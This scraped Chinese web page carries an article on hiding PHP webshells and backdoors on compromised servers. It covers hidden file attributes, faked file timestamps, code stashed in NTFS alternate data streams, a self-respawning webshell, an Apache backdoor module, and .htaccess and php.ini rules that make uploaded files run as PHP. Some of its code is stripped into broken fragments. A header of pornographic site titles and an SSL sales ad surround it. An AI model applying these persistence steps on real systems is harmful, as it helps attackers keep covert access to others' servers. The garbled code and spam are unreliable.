日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
PHP后門隱藏技巧

 如果想讓自己的Webshell留的更久一些,除了Webshell要免殺,還需要注意一些隱藏技巧,比如隱藏文件,修改時間屬性,隱藏文件內(nèi)容等。

澄江ssl適用于網(wǎng)站、小程序/APP、API接口等需要進行數(shù)據(jù)傳輸應用場景,ssl證書未來市場廣闊!成為創(chuàng)新互聯(lián)的ssl證書銷售渠道,可以享受市場價格4-6折優(yōu)惠!如果有意向歡迎電話聯(lián)系或者加微信:028-86922220(備注:SSL證書合作)期待與您的合作!

1、隱藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統(tǒng)文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。

attrib +s +a +h +r shell.php //隱藏shell.php文件

2、修改文件時間屬性

當你試圖在一堆文件中隱藏自己新創(chuàng)建的文件,那么,除了創(chuàng)建一個迷惑性的文件名,還需要修改文件的修改日期。

//修改時間修改Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"http://訪問時間修改Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"http://創(chuàng)建時間修改Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令獲取文件屬性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某個文件夾下所有文件的創(chuàng)建和修改時間

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隱藏文件內(nèi)容

在服務器上echo一個數(shù)據(jù)流文件進去,比如index.php是網(wǎng)頁正常文件,我們可以這樣子搞:

echo ^ > index.php:hidden.jpg

這樣子就生成了一個不可見的shell hidden.jpg,常規(guī)的文件管理器、type命令,dir命令、del命令發(fā)現(xiàn)都找不出那個hidden.jpg的。

利用include函數(shù),將index.php:hidden.jpg進行hex編碼,把這個ADS文件include進去,這樣子就可以正常解析我們的一句話了。

4、不死馬

不死馬會刪除自身,以進程的形式循環(huán)創(chuàng)建隱蔽的后門。

'); //創(chuàng)建shell.php,這里最好用免殺的一句話 sleep(10); //間隔時間}?>

處理方式最簡單有效的辦法,就是重啟服務就可以刪除webshell文件。

5、中間件后門

將編譯好的so文件復制到modules文件夾,啟動后門模塊,重啟Apache。當發(fā)送特定參數(shù)的字符串過去時,即可觸發(fā)后門。

github項目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404頁面隱藏后門

404頁面主要用來提升用戶體驗,可用來隱藏后門文件。

The requested URL was not found on this server.

7、利用 .htaccess 文件構成PHP后門

一般.htaccess可以用來留后門和針對黑名單繞過,在上傳目錄創(chuàng)建.htaccess 文件寫入,無需重啟即可生效,上傳png文件解析。

AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析規(guī)則,把文件名包含1的解析成php,上傳1.txt即可解析。

SetHandler application/x-httpd-php

8、利用 php.ini 隱藏后門文件

php.ini 中可以指定在主文件執(zhí)行前后自動解析的文件名稱,常用于頁面公共頭部和尾部,也可以用來隱藏php后門。

;在PHP文檔之前自動添加文件。auto_prepend_file = "c:\tmp.txt";在PHP文檔之后自動添加文件。auto_prepend_file = "c:\tmp.txt"

需重啟服務生效,訪問任意一個php文件即可獲取webshell。


分享名稱:PHP后門隱藏技巧
文章起源:http://m.5511xx.com/article/djcsjpe.html